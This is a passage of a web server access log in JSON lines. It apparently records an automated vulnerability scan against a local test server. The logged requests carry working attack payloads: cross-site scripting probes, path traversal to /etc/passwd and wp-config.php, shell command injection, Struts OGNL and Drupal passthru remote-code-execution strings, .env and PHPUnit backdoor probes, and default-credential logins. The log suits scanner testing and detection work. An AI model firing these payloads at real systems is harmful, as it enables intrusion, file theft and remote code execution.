/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /agc/vicidial_mysqli_errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"LKPPQaP3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /functionRouter HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"j_username=admin&j_password=admin&from=%2F&Submit=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#post_render][]\x22\x0D\x0A\x0D\x0Apassthru\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#type]\x22\x0D\x0A\x0D\x0Amarkup\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#markup]\x22\x0D\x0A\x0D\x0Acat /etc/passwd\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22form_id\x22\x0D\x0A\x0D\x0Auser_register_form\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22_drupal_ajax\x22\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"127.0.0.1/user/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) 